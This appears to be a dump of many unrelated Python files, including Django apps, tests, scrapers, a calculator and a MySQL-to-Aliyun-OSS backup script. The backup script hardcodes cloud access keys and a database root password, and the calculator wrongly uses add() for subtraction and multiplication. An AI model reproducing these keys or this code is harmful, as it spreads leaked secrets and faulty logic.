text stringlengths 38 1.54M |
|---|
# Run command file for percol
##########################################c
percol.import_keymap({
"C-g" : lambda percol: percol.cancel(),
"C-j" : lambda percol: percol.command.select_next(),
"C-k" : lambda percol: percol.command.select_previous(),
"C-n" : lambda percol: percol.command.select_next(),
"C-p" : lambda percol: percol.command.select_previous(),
"C-f" : lambda percol: percol.command.select_next_page(),
"C-b" : lambda percol: percol.command.select_previous_page(),
})
|
from django.urls import path
import recibos.views as recibos_views
urlpatterns = [
path('',recibos_views.RecibosList.as_view(),name="recibos"),
path('<int:pk>',recibos_views.RecibosDetail.as_view(),name="recibo"),
path('<int:pk>/file',recibos_views.RecibosByteDetail.as_view(),name="recibo_file")
]
|
import pytest
from takler.core import Limit, Task, SerializationType
from takler.core.limit import InLimit, InLimitManager
def test_limit_to_dict():
limit = Limit("upload_limit", 10)
assert limit.to_dict() == dict(
name="upload_limit",
limit=10,
value=0,
node_paths=list(),
)
limit.increment(1, "/flow1/task1")
assert limit.to_dict() == dict(
name="upload_limit",
limit=10,
value=1,
node_paths=["/flow1/task1"]
)
limit.increment(1, "/flow1/task2")
assert limit.to_dict() == dict(
name="upload_limit",
limit=10,
value=2,
node_paths=[
"/flow1/task1",
"/flow1/task2",
]
)
limit.decrement(1, "/flow1/task1")
assert limit.to_dict() == dict(
name="upload_limit",
limit=10,
value=1,
node_paths=[
"/flow1/task2"
]
)
def test_limit_from_dict():
d = dict(
name="upload_limit",
limit=10
)
assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
with pytest.raises(KeyError):
Limit.from_dict(d)
with pytest.raises(KeyError):
Limit.from_dict(d, method=SerializationType.Status)
d = dict(
name="upload_limit",
limit=10,
value=1,
node_paths=["/flow1/task1"]
)
limit = Limit("upload_limit", 10)
limit.increment(1, "/flow1/task1")
assert Limit.from_dict(d) == limit
assert Limit.from_dict(d, method=SerializationType.Status) == limit
assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
d = dict(
name="upload_limit",
limit=10,
value=2,
node_paths=[
"/flow1/task1",
"/flow1/task2",
]
)
limit.increment(1, "/flow1/task2")
assert Limit.from_dict(d) == limit
assert Limit.from_dict(d, method=SerializationType.Status)
assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
d = dict(
name="upload_limit",
limit=10,
value=1,
node_paths=[
"/flow1/task2"
]
)
limit.decrement(1, "/flow1/task1")
assert Limit.from_dict(d) == limit
assert Limit.from_dict(d, method=SerializationType.Status)
assert Limit.from_dict(d, method=SerializationType.Tree) == Limit("upload_limit", 10)
def test_in_limit_to_dict():
limit = Limit("upload_limit", 10)
in_limit = InLimit("upload_limit")
in_limit.set_limit(limit)
assert in_limit.to_dict() == dict(
limit_name="upload_limit",
tokens=1,
node_path=None,
)
def test_in_limit_from_dict():
d = dict(
limit_name="upload_limit",
tokens=1,
node_path=None,
)
assert InLimit.from_dict(d, method=SerializationType.Tree) == InLimit(
limit_name="upload_limit", tokens=1, node_path=None)
assert InLimit.from_dict(d, method=SerializationType.Status) == InLimit(
limit_name="upload_limit", tokens=1, node_path=None)
assert InLimit.from_dict(d) == InLimit(limit_name="upload_limit", tokens=1, node_path=None)
def test_in_limit_manager_to_dict():
limit = Limit("upload_limit", 10)
in_limit = InLimit("upload_limit")
in_limit.set_limit(limit)
limit_2 = Limit("run_limit", 5)
in_limit_2 = InLimit("run_limit")
in_limit_2.set_limit(limit)
node = Task("task1")
in_limit_manager = InLimitManager(node)
in_limit_manager.add_in_limit(in_limit)
assert in_limit_manager.to_dict() == dict(
in_limit_list=[
dict(
limit_name="upload_limit",
tokens=1,
node_path=None,
)
]
)
in_limit_manager.add_in_limit(in_limit_2)
assert in_limit_manager.to_dict() == dict(
in_limit_list=[
dict(
limit_name="upload_limit",
tokens=1,
node_path=None,
),
dict(
limit_name="run_limit",
tokens=1,
node_path=None,
)
]
)
def test_in_limit_manager_from_dict():
d = dict(
in_limit_list=[
dict(
limit_name="upload_limit",
tokens=1,
node_path=None,
)
]
)
expected_node = Task("task1")
expected_node.add_in_limit("upload_limit")
node = Task("task1")
InLimitManager.fill_from_dict(d, node=node)
assert node.in_limit_manager == expected_node.in_limit_manager
expected_node.add_in_limit("run_limit")
d = dict(
in_limit_list=[
dict(
limit_name="upload_limit",
tokens=1,
node_path=None,
),
dict(
limit_name="run_limit",
tokens=1,
node_path=None,
)
]
)
node = Task("task1")
InLimitManager.fill_from_dict(d, node=node)
assert node.in_limit_manager == expected_node.in_limit_manager
|
import xlrd
excelFile1 = 'excel1.xlsx'
excelFile2 = 'excel2.xlsx'
book1 = xlrd.open_workbook(excelFile1)
book2 = xlrd.open_workbook(excelFile2)
first_sheet = book1.sheet_by_index(0)
second_sheet = book2.sheet_by_index(0) |
#!/usr/local/bin/python3.5
import os,time,sys,time
import oss2
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from lib import innodb_backup as lib_innodb_backup
def upload(host,user,password,port,my_conf):
abc=lib_innodb_backup.backup(host,user,password,port,my_conf)
auth = oss2.Auth('LTAIQFvh36NyxuxI', 'M6Au2n69pz7mZFVrICKaQaFKxTv2do')
# service = oss2.Service(auth, 'oss-cn-beijing.aliyuncs.com')
# print([b.name for b in oss2.BucketIterator(service)])
ticks = time.strftime("%Y%d%m_%H%M")
bucket = oss2.Bucket(auth, 'oss-cn-beijing.aliyuncs.com', 'tplinuxmysqlbackup')
oss2.resumable_upload(bucket, ticks+'.tar.gz', "%s.tar.gz"%abc)
upload('127.0.0.1','root','redhat',3306,'/etc/my.cnf')
|
def add(x, y):
return x + y
def subtract(x, y):
return x - y
def multiply(x, y):
return x * y
def divide(x, y):
return x / y
print("Select One Please:")
print("1. Addition")
print("2. Subtraction")
print("3. Multiplication")
print("4. divide")
choice = input("Please Select One Now:")
num1 = int(input("Enter The First Number"))
num2 = int(input("Enter Your Second Number"))
if choice == '1':
print(num1,"+",num2,"=",add(num1,num2))
elif choice == '2':
print(num1,"-",num2,'=',add(num1,num2))
elif choice == '3':
print(num1,'*',num2,'=',add(num1,num2))
elif choice == '4':
print(num1,'/',num2,'=',divide(num1,num2))
else:
print("Invalid Input")
|
from splinter import Browser
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
import requests
import pandas as pd
import time
import os
def init_browser():
# NOTE: Replace the path with your actual path to the chromedriver
executable_path = {'executable_path': ChromeDriverManager().install()}
return Browser('chrome', **executable_path, headless=False)
def scrape():
browser = init_browser()
# NASA Mars News Scrape
news_url="https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest"
browser.visit(news_url)
# HTML object
html = browser.html
# Parse HTML with Beautiful Soup
soup = BeautifulSoup(html, 'html.parser')
#Select latest category
browser.find_by_id('date').first.click()
browser.find_option_by_text('Latest').first.click()
#Select All categories
browser.find_by_id('categories').first.click()
browser.find_option_by_text('All Categories').first.click()
browser.find_by_id('categories').first.click()
time.sleep(0)
#Collect the latest News Title
results=soup.find('li', class_="slide")
# Pase the first title from the results
news_title =results.find('div',class_='content_title').text.strip()
# Parse out the first paragraph associatd with the tile from results
news_p=results.find('div',class_='article_teaser_body').text.strip()
# -------------------------------------------------------------------------------
# JPL Mars Space Images - Featured Image
#Use splinter to browse through page
images_url="https://www.jpl.nasa.gov/images?search=&category=Mars"
browser.visit(images_url)
# HTML object
html = browser.html
# Parse HTML with Beautiful Soup
soup = BeautifulSoup(html, 'html.parser')
#Use splinter to clisk on Mars filter
browser.find_by_id('filter_Mars').click()
#Find image url and save to variable
featured_image_url=browser.find_by_css('.BaseImage')['data-src']
# -------------------------------------------------------------------------------
# MARS Facts
#Use splinter to browse through page
facts_url="https://space-facts.com/mars/"
browser.visit(facts_url)
# Use Panda's `read_html` to parse the url
facts_tables = pd.read_html(facts_url)
# parse through list of dataframes for Mars Facts
mars_0_df=facts_tables[0]
#Rename columns
column_names={
0: "Description",
1: "Mars Fact"
}
mars_1_df=mars_0_df.rename(columns=column_names)
#Set the index of the columns to Description of facts
mars_df=mars_1_df.set_index("Description")
#Convers Mars DF to html table
mars_facts_html=mars_df.to_html()
# -------------------------------------------------------------------------------
# Mars Hemispheres
#Use splinter to browse through page
hemispheres_url="https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
browser.visit(hemispheres_url)
# HTML object
html = browser.html
# Parse HTML with Beautiful Soup
soup = BeautifulSoup(html, 'html.parser')
# Retrieve all elements that contain hemisphere information
#Find the image link to access the high resolution image
results = soup.find_all('div', class_='item')
results
hemisphere_image_urls=[]
count=0
for each_result in results:
title=each_result.find('h3').text
browser.find_by_tag("h3")[count].click()
time.sleep(0.5)
count=count+1
html = browser.html
# soup_2 = BeautifulSoup(html, 'html.parser')
img_url=browser.find_by_text('Sample')['href']
hemisphere_dict={
"title": title,
"img_url":img_url
}
hemisphere_image_urls.append(hemisphere_dict)
time.sleep(0.5)
browser.visit(hemispheres_url)
browser.quit()
mars_dict={
"Title":news_title,
"Paragraph":news_p,
"FeaturedImage": featured_image_url,
"MarsFacts": mars_facts_html,
"HemisphereImages": hemisphere_image_urls
}
return mars_dict |
# this section of the code does not process or analyze anything. This simply exists to call on other modules to collect, store and use
# their outputs. This file requires all the imports just as all the imports mentioned here cannot run without this file. This code exists
# purely for organizational purposes and should not be taken as anything else.
import audio_pcg
import ewt
import sound_recog
import grapher
import numpy as np
import matplotlib.pyplot as plt
audio_pcg.write_to_sheet()
env, phase, signal = ewt.transform()
phase_list = phase.tolist()
segmented_vector = sound_recog.segment(phase_list)
print('pcg segments')
print(*segmented_vector, sep='\n')
intl, dur, area_env = sound_recog.initialize_parameters(segmented_vector, phase_list)
heart_sounds = sound_recog.recog(len(segmented_vector), dur, area_env, intl)
print()
print('heart sounds extracted from input signal')
print(*heart_sounds, sep='\n')
col = grapher.get_colors(segmented_vector, env, heart_sounds)
x = np.arange(len(signal))
grapher.plot_multicolored_lines(x, signal, col)
plt.show()
# plt.plot(x)
# plt.show()
|
import copy
import logging
from topicnet.cooking_machine.models import (
BaseScore as BaseTopicNetScore,
TopicModel
)
from .base_score import BaseScore
_logger = logging.getLogger()
# TODO: kostyl
global __NO_LOADING_DATASET__
__NO_LOADING_DATASET__ = [False]
class BaseCustomScore(BaseScore):
def __init__(self, name, higher_better: bool = True):
super().__init__(name, higher_better)
def _attach(self, model: TopicModel):
if self._name in model.custom_scores:
_logger.warning(
f'Score with such name "{self._name}" already attached to model!'
f' So rewriting it...'
f' All model\'s custom scores: {list(model.custom_scores.keys())}'
)
# TODO: workaround: maybe a better way is possible
setattr(self._score, '_higher_better', self._higher_better)
# TODO: TopicModel should provide ability to add custom scores
model.custom_scores[self.name] = copy.deepcopy(self._score)
def _initialize(self) -> BaseTopicNetScore:
raise NotImplementedError()
|
from django.db import models
# Create your models here.
class Adminmodel(models.Model):
User_Name=models.CharField(max_length=30)
Password=models.CharField(max_length=8)
def __str__(self):
return self.User_Name
class StateModel(models.Model):
State_no=models.AutoField(primary_key=True)
State_Name=models.CharField(max_length=30,unique=True)
def __str__(self):
return self.State_Name
class CityModel(models.Model):
City_No=models.AutoField(primary_key=True)
City_Name=models.CharField(max_length=40,unique=True)
State_Name=models.ForeignKey(StateModel,on_delete=models.CASCADE)
def __str__(self):
return self.City_Name
class AreaModel(models.Model):
Area_No=models.AutoField(primary_key=True)
Area_Name=models.CharField(max_length=30,unique=True)
City_Name=models.ForeignKey(CityModel,on_delete=models.CASCADE)
def __str__(self):
return self.Area_Name
class Type_of_resModel(models.Model):
Type_No=models.AutoField(primary_key=True)
Type_Of_Place=models.CharField(max_length=40)
def __str__(self):
return self.Type_Of_Place
class UserModel(models.Model):
Email=models.CharField(primary_key=True,max_length=30)
Password=models.IntegerField()
Name=models.CharField(max_length=30,default=None)
Age=models.IntegerField(default=None)
Phone=models.IntegerField(default=None)
Gender=models.CharField(max_length=7,default=None)
Door_No=models.CharField(max_length=7,default=None)
Street=models.CharField(max_length=30,default=None)
Area_Or_Village=models.CharField(max_length=30,default=None)
City=models.CharField(max_length=30,default=None)
class orderFoodModel(models.Model):
F_id=models.AutoField(primary_key=True)
F_name=models.CharField(max_length=30)
F_price=models.FloatField()
F_image=models.ImageField(upload_to='orders/')
F_type=models.CharField(max_length=30) |
import pyforms, numpy as np, traceback, math
from pyforms.basewidget import BaseWidget
from pyforms.controls import ControlLabel
from pyforms.controls import ControlText
from pyforms.controls import ControlButton
from pyforms.controls import ControlCombo
from pyforms.controls import ControlCheckBox
from pyforms.controls import ControlFile
from pyforms.controls import ControlList
from pyforms.controls import ControlTextArea
from pyforms.controls import ControlNumber
from pyforms.controls import ControlMatplotlib
from .module_api import WavePlayerModule
class OutputChannelGUI(BaseWidget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.api = kwargs.get('api', None)
self.channel_index = kwargs.get('channel_index', None)
self.set_margin(10)
self.setMinimumHeight(60)
self._evt_report = ControlCheckBox('Event report', changed_event=self.__event_report_changed_event, default=kwargs.get('event_report',False) )
self._loop_mode = ControlCheckBox('Loop mode', changed_event=self.__loop_mode_changed_event, default=kwargs.get('loop_mode',False) )
self._loop_duration = ControlText('Loop duration', changed_event=self.__loop_duration_changed_event, default=kwargs.get('loop_duration',False) )
self.formset = [('_evt_report', ' ', '_loop_duration', '_loop_mode')]
def __event_report_changed_event(self):
value = self._evt_report.value
channel_index = self.channel_index-1
data = self.api.bpod_events
data[channel_index] = value
if not self.api.set_bpod_events(data):
self.alert( 'Not able to set bpod events: {0}'.format(data) )
def __loop_mode_changed_event(self):
value = self._loop_mode.value
channel_index = self.channel_index-1
data = self.api.loop_mode
data[channel_index] = value
try:
if not self.api.set_loop_mode(data):
self.alert( 'Not able to set loop mode: {0}'.format(data) )
except Exception:
self.critical( traceback.format_exc(), 'An error occurred')
def __loop_duration_changed_event(self):
value = self._loop_duration.value
channel_index = self.channel_index-1
data = self.api.loop_duration
data[channel_index] = value
if not self.api.set_loop_duration(data):
self.alert( 'Not able to set loop duration: {0}'.format(data) )
class WavePlayerModuleGUI(WavePlayerModule, BaseWidget):
TITLE = 'Analog Output Module'
def __init__(self, parent_win = None):
BaseWidget.__init__(self, self.TITLE, parent_win = parent_win)
WavePlayerModule.__init__(self)
self.set_margin(10)
self._port = ControlText('Serial port', default = '/dev/ttyACM0')
self._connect_btn = ControlButton('Connect', checkable=True, default = self.__connect_btn_evt)
self._getparams_btn = ControlButton('Get Parameters', default=self.get_parameters, enabled=False)
self._info = ControlTextArea('Information', enabled=False)
self._channels = ControlList('Channels', readonly=True, enabled=False)
self._triggermode = ControlCombo('Channel Select', changed_event=self.__set_trigger_mode_evt, enabled=False)
self._outputrange = ControlCombo('Output range', changed_event=self.__set_output_range_evt, enabled=False)
self._triggermode.add_item('Normal',0)
self._triggermode.add_item('Master',1)
self._triggermode.add_item('Toggle',2)
self._outputrange.add_item('0V to +5V',0)
self._outputrange.add_item('0V to +10V',1)
self._outputrange.add_item('0V to +12V',2)
self._outputrange.add_item('-5V to +5V',3)
self._outputrange.add_item('-10V to +10V',4)
self._outputrange.add_item('-12V to +12V',5)
self._wavegraph = ControlMatplotlib('Waveform', on_draw=self.__on_draw_evt)
self._amplitude = ControlNumber('Amplitude', default=1.0, minimum=0, maximum=1000, changed_event=self._wavegraph.draw, enabled=False)
self._duration = ControlNumber('Duration', default=3.0, minimum=0, maximum=100, changed_event=self._wavegraph.draw, enabled=False)
self._frequency = ControlNumber('Frequency', default=1000.0, minimum=1, maximum=10000, changed_event=self._wavegraph.draw, enabled=False)
self._samplerate = ControlNumber('Sample rate', default=96000, minimum=1, maximum=100000, changed_event=self._wavegraph.draw, enabled=False)
self._wave_index = ControlNumber('Waveform', enabled=False)
self._channel_index = ControlNumber('Channel', minimum=1, default=1, enabled=False)
self._load_waveform_btn = ControlButton('Load waveform', default=self.__load_waveform_btn_evt, enabled=False)
self._play_waveform_btn = ControlButton('Play', default=self.__play_btn_evt, enabled=False)
self._stop_waveform_btn = ControlButton('Stop', default=self.__stop_btn_evt, enabled=False)
self.formset = [
{
'a:Connection' :[
('_port','_connect_btn'),
('_triggermode', '_outputrange'),
('_amplitude', '_duration', '_frequency', '_samplerate'),
'_wavegraph',
('_wave_index','_load_waveform_btn', '_channel_index', '_play_waveform_btn', '_stop_waveform_btn')
],
'c: Channels': ['_channels'],
'd:Information': ['_getparams_btn','_info']
}
]
##########################################################################
## EVENTS ################################################################
##########################################################################
def __set_output_range_evt(self):
if not self.form_has_loaded: return
self.set_output_range(self._outputrange.value)
def __set_trigger_mode_evt(self):
if not self.form_has_loaded: return
self.set_trigger_mode(self._triggermode.value)
def __set_trigger_profiles_evt(self):
self.set_trigger_profiles(self._triggerprofiles.value)
def __play_btn_evt(self):
self.play( int(self._channel_index.value), int(self._wave_index.value) )
def __stop_btn_evt(self):
self.stop()
def __on_draw_evt(self, figure):
try:
axes = figure.add_subplot(111)
axes.clear()
samples = np.arange(0.0, self._duration.value, 1.0/self._samplerate.value)
wave = self._amplitude.value * np.sin(2.0*math.pi*self._frequency.value*samples)
axes.plot(wave)
y = self._amplitude.value
x = math.asin( y/self._amplitude.value )/(2.0*math.pi*self._frequency.value)
axes.set_xlim(0, x/(1/self._samplerate.value)*8 )
axes.set_ylim( np.min(wave), np.max(wave) )
self._wavegraph.repaint()
except:
self.critical( traceback.format_exc(), 'An error occurred')
def __connect_btn_evt(self):
if self._connect_btn.checked:
self.open(self._port.value)
else:
self.disconnect()
def __load_waveform_btn_evt(self):
samples = np.arange(0.0, self._duration.value, 1.0/self._samplerate.value)
wave = self._amplitude.value * np.sin(2.0*math.pi*self._frequency.value*samples)
self.set_sampling_period(self._samplerate.value)
res = self.load_waveform( int(self._wave_index.value) , wave)
if not res:
self.alert('Failed to load the waveform')
##########################################################################
## OVERRIDE FUNCTIONS ####################################################
##########################################################################
def open(self, port):
res = super().open(port)
if res:
self._connect_btn.label = 'Disconnect'
self._channels.enabled = True
self._getparams_btn.enabled = True
self._info.enabled = True
self._channels.enabled = True
self._outputrange.enabled = True
self._triggermode.enabled = True
self._wavegraph.enabled = True
self._amplitude.enabled = True
self._duration.enabled = True
self._frequency.enabled = True
self._samplerate.enabled = True
self._wave_index.enabled = True
self._channel_index.enabled = True
self._load_waveform_btn.enabled = True
self._play_waveform_btn.enabled = True
self._stop_waveform_btn.enabled = True
for i in range(self.n_channels):
self._channels += ('({0})'.format(i+1),
OutputChannelGUI(
api=self,
channel_index=i+1,
event_report=bool(self.bpod_events[i]),
loop_mode=bool(self.loop_mode[i]),
loop_duration=str(self.loop_duration[i]),
)
)
self._wavegraph.draw()
else:
self._connect_btn.checked = False
def disconnect(self):
super().disconnect()
self._connect_btn.label = 'Connect'
self._channels.clear()
self._info.value = ''
self._channels.enabled = False
self._getparams_btn.enabled = False
self._info.enabled = False
self._channels.enabled = False
self._outputrange.enabled = False
self._triggermode.enabled = False
self._wavegraph.enabled = False
self._amplitude.enabled = False
self._duration.enabled = False
self._frequency.enabled = False
self._samplerate.enabled = False
self._wave_index.enabled = False
self._channel_index.enabled = False
self._load_waveform_btn.enabled = False
self._play_waveform_btn.enabled = False
self._stop_waveform_btn.enabled = False
def get_parameters(self):
super().get_parameters()
self._wave_index.max = self.max_waves-1
self._channel_index.max = self.n_channels
text = ''
text += 'Number of channels: {0}\n'.format(self.n_channels)
text += 'Max waves: {0}\n'.format(self.max_waves)
text += 'Trigger mode: {0}\n'.format(self.trigger_mode)
text += 'Trigger profile enabled: {0}\n'.format(self.trigger_profile_enable)
text += 'Number of trigger profiles: {0}\n'.format(self.n_trigger_profiles)
text += 'Output range: {0}\n'.format(self.output_range)
text += 'Bpod events: {0}\n'.format(self.bpod_events)
text += 'Loop mode {0}\n'.format(self.loop_mode)
text += 'Sampling rates: {0}\n'.format(self.sampling_rate)
text += 'Loop durations: {0}\n'.format(self.loop_duration)
self._info.value = text
self._outputrange.value = self.output_range
self._triggermode.value = self.trigger_mode
windows = self._channels.value
for i in range( len(windows) ):
windows[i][1]._evt_report.value = self.bpod_events[i]
windows[i][1]._loop_mode.value = self.loop_mode[i]
windows[i][1]._loop_duration.value = str(self.loop_duration[i])
def _stop(self):
self.stop()
def before_close_event(self):
self.close()
super().before_close_event()
if __name__=='__main__':
pyforms.start_app( WavePlayerModuleGUI, geometry=(2000,0,600,500) ) |
#!/usr/bin/env python3
"""Test out the sandbox helper class."""
import sys, os, re
import unittest
import logging
import time
from datetime import datetime
from sandbox import TestSandbox
DATA_DIR = os.path.abspath(os.path.dirname(__file__) + '/asandbox')
VERBOSE = os.environ.get('VERBOSE', '0') != '0'
class T(unittest.TestCase):
def setUp(self):
# Most of the time the class will be used like this
self.sb = TestSandbox(DATA_DIR)
# Users of the TestSandbox need to clean up explicitly (this is useful since we could skip the
# cleanup to manually examine the temp dir)
self.addCleanup(self.sb.cleanup)
### THE TESTS ###
def test_basic(self):
"""The sandbox dir has two files and a symlink
"""
self.assertEqual(self.sb.lsdir('.'), ['alink1', 'foo1', 'foo2'])
def test_empty(self):
"""Make a new empty sandbox (ignoring the default)
"""
sb2 = TestSandbox()
sb2_dir = sb2.sandbox
self.assertEqual(sb2.lsdir('.'), [])
new_dir = sb2.make('foo777/')
self.assertEqual(new_dir, sb2_dir + '/foo777/')
self.assertTrue(os.path.isdir(new_dir))
sb2.cleanup()
self.assertFalse(os.path.isdir(sb2_dir))
def test_touch_link(self):
"""If I touch the link it should touch the link not the file.
"""
unixtime = time.time()
sb_dir = self.sb.sandbox + '/'
self.assertTrue( os.path.islink(sb_dir + 'alink1') )
self.assertTrue( os.lstat(sb_dir + 'foo1').st_mtime < unixtime )
self.assertTrue( os.lstat(sb_dir + 'foo2').st_mtime < unixtime )
self.assertTrue( os.lstat(sb_dir + 'alink1').st_mtime < unixtime )
# Touch it!
self.sb.touch('alink1')
self.assertTrue( os.lstat(sb_dir + 'foo1').st_mtime < unixtime )
self.assertTrue( os.lstat(sb_dir + 'foo2').st_mtime < unixtime )
self.assertFalse( os.lstat(sb_dir + 'alink1').st_mtime < unixtime )
def test_touch_link2(self):
"""Recursive touch should affect links too.
"""
sb_dir = self.sb.sandbox + '/'
# Make everything 20 hours old then set the time on foo2 as a comparison
self.sb.touch('.', recursive=True, hours_age=20)
self.sb.touch('foo2', hours_age=10)
self.assertTrue( os.lstat(sb_dir + 'foo1').st_mtime < os.lstat(sb_dir + 'foo2').st_mtime )
self.assertTrue( os.lstat(sb_dir + 'alink1').st_mtime < os.lstat(sb_dir + 'foo2').st_mtime )
def test_touch_timestamp(self):
"""I can now specify a timestamp for touching files
If the timestamp and hours_age are both specified, then the hours should
be subtracted from the timestamp.
"""
self.sb.touch('foo1', timestamp=946771200)
self.sb.touch('foo2', timestamp=946771200, hours_age=24)
sb_dir = self.sb.sandbox + '/'
self.assertEqual( datetime.utcfromtimestamp(os.stat(sb_dir + 'foo1').st_mtime),
datetime(year=2000, month=1, day=2) )
self.assertEqual( datetime.utcfromtimestamp(os.stat(sb_dir + 'foo2').st_mtime),
datetime(year=2000, month=1, day=1) )
def test_make_touch(self):
"""Do some stuff in the default sandbox
"""
res1 = self.sb.make('d1/d2/d3/afile', hours_age=1)
res2 = self.sb.make('da/db/dc/')
sb_dir = self.sb.sandbox + '/'
self.assertEqual(res1, sb_dir + 'd1/d2/d3/afile')
self.assertTrue(os.path.isfile(res1))
self.assertEqual(res2, sb_dir + 'da/db/dc/')
self.assertTrue(os.path.isdir(res2))
# Get the current system time
unixtime = time.time()
self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
self.sb.touch('d1/d2')
self.assertTrue( os.stat(sb_dir + 'd1').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2').st_mtime < unixtime )
self.assertTrue( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
self.sb.touch('d1/d2', recursive=True)
self.assertTrue( os.stat(sb_dir + 'd1').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
self.sb.touch('d1/d2/d3/afile', hours_age=3)
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
self.sb.touch('.', recursive=True)
self.assertFalse( os.stat(sb_dir + 'd1').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
self.sb.make('d1/d2/d3/bfile', hours_age=1)
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
self.assertFalse( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/bfile').st_mtime < unixtime )
def test_links(self):
"""Make some links with the link() method
"""
res1 = self.sb.link("foo2", "alink2")
res2 = self.sb.link("foo2", "new/dir/alink2")
# Links in subdirs should work, either because they are fixed relative or made
# absolute. It doesn't really matter which.
if VERBOSE:
print(res2)
print(os.readlink(res2))
print(os.lstat(res2))
print(os.stat(res2))
self.assertTrue( os.path.islink(res1) )
self.assertTrue( os.path.islink(res2) )
self.assertEqual( os.stat(res1), os.stat(os.path.join(self.sb.sandbox, "foo2")) )
self.assertEqual( os.stat(res2), os.stat(os.path.join(self.sb.sandbox, "foo2")) )
def test_errors(self):
"""I can't make a file twice, or touch a file that doesn't exsist.
"""
self.sb.make("la/la")
self.assertRaises(FileExistsError, self.sb.make, "la")
self.assertRaises(FileExistsError, self.sb.make, "la/la")
# Ditto if I try to make a link
self.assertRaises(FileExistsError, self.sb.link, "dummy_target", "la/la")
# But making a directory that pre-exists is just a no-op
self.assertEqual(self.sb.make("la/"), os.path.join(self.sb.sandbox, "la/"))
# I can't touch a file that doesn't exist
self.assertRaises(FileNotFoundError, self.sb.touch, 'notafile')
self.assertRaises(FileNotFoundError, self.sb.touch, 'notadir', recursive=True)
# I can't recursively touch a file
self.assertRaises(NotADirectoryError, self.sb.touch, 'la/la', recursive=True)
def test_remove_readonly(self):
"""Cleanup should work even if a file or directory is read-only
"""
# For this we need a second sandbox since we need to explictly call cleanup
sb2 = TestSandbox()
tmp_dir = sb2.sandbox
self.assertTrue(os.path.exists(tmp_dir))
sb2.make("badperms_dir/badperms_file")
os.chmod(os.path.join(sb2.sandbox, "badperms_dir/badperms_file"), 0)
os.chmod(os.path.join(sb2.sandbox, "badperms_dir"), 0)
sb2.cleanup()
self.assertFalse(os.path.exists(tmp_dir))
if __name__ == '__main__':
unittest.main()
|
import pytest
from src.controllers.base_controller import BaseController
from src.controllers.bet_controller import BetController
from src.models.bet import Bet
@pytest.fixture
def create_instance():
bet = BetController()
return bet
def test_bet_controller_instance(create_instance):
assert isinstance(create_instance, BaseController)
assert isinstance(create_instance, BetController)
def test_read_all_should_return_list(create_instance):
result = create_instance.read_all()
assert isinstance(result, list)
def test_read_by_id_with_invalid_id_should_raise_exception(create_instance):
with pytest.raises(Exception) as exc:
create_instance.read_by_id(71289379)
assert str(exc.value) == 'Object not found in the database.'
|
# 496. Next Greater Element I
# Runtime: 44 ms, faster than 88.07% of Python3 online submissions for Next Greater Element I.
# Memory Usage: 14.5 MB, less than 43.69% of Python3 online submissions for Next Greater Element I.
class Solution:
# Stack
def nextGreaterElement(self, nums1: list[int], nums2: list[int]) -> list[int]:
idx = {}
stack = []
for n in nums2:
while stack and n > stack[-1]:
idx[stack.pop()] = n
stack.append(n)
while stack:
idx[stack.pop()] = -1
return [idx[i] for i in nums1] |
from ut import runcleos
import json
def _push_transaction(d):
cmd = [
"cleos",
"-u",
"https://api.eosbeijing.one",
"push",
"transaction",
json.dumps(d),
]
return runcleos(cmd)
def getaction(contract, action, data, f, p=False):
"""
contract :要玩的合约地址
action: 玩的方法
data : 详细信息
f :账号
"""
cmd = [
"cleos",
"-u",
"https://api.eosbeijing.one",
"push",
"action",
contract,
action,
json.dumps(data),
"-d",
"-s",
"-p",
f,
]
return json.loads(runcleos(cmd))
def push_transaction(actions):
"""
actions是 由多个action组成
每个action由 [合约账号,调用方法,调用参数,签名者] 组成
"""
# actions = [
# ["eosio.token","transfer",["eosbocaira12", "redredredred", "1.0000 EOS", "save"],"eosbocaira12"],
# ["eosio.token","transfer",["eosbocaira12", "redredredred", "1.0000 EOS", "save"],"eosbocaira12"],
# ["eosio.token","transfer",["eosbocaira12", "redredredred", "1.0000 EOS", "save"],"eosbocaira12"],
# ]
for i in range(len(actions)):
action = getaction(*actions[i])
if i == 0:
ret = action
else:
ret["actions"].extend(action["actions"])
return _push_transaction(ret)
if __name__ == "__main__":
actions = [
[
"eosio.token",
"transfer",
["eosbocaira12", "redredredred", "1.0000 EOS", "save"],
"eosbocaira12",
],
[
"eosio.token",
"transfer",
["eosbocaira12", "redredredred", "1.0000 EOS", "save"],
"eosbocaira12",
],
[
"eosio.token",
"transfer",
["eosbocaira12", "redredredred", "1.0000 EOS", "save"],
"eosbocaira12",
],
]
print(push_transaction(actions))
|
from libs import pygame_textinput
import pygame
import time
from random import randrange
from objects.foca import Foca
from objects.alga import Alga
from objects.tubarao import Tubarao
from objects.peixe import Peixe
import random
from objects.tela import Tela
from objects.utils import utils
